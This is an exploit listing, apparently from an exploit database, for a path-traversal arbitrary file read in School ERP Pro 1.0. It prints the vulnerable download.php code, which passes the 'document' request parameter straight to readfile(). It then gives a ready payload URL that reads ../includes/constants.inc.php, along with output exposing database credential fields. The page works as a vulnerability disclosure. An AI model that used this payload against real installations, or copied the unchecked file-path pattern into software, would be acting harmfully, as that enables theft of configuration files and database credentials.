school erp pro 1.0 arbitrary file read
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: School ERP Pro 1.0 - Arbitrary File Read # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT # CVE: N/A Vulnerable code: (/student_staff/download.php) - File Name: download.php - Content of the download.php <?php if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { $file = $_REQUEST['document']; header("Content-type: application/force-download"); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header("Content-disposition: attachment; filename=\"".$file."\""); readfile($file); exit; } ?> ------------ *Payload:* --------------- http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php ------------------------ *After run payload: (we accessed of the file content)* ------------------------ <?php define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'aroxi********'); define('DB_SERVER_PASSWORD', 'erp**********'); define('DB_DATABASE', 'aroxi****************'); ?>
School erp pro 1.0 arbitrary file read Vulnerability / Exploit Source : School erp pro 1.0 arbitrary file read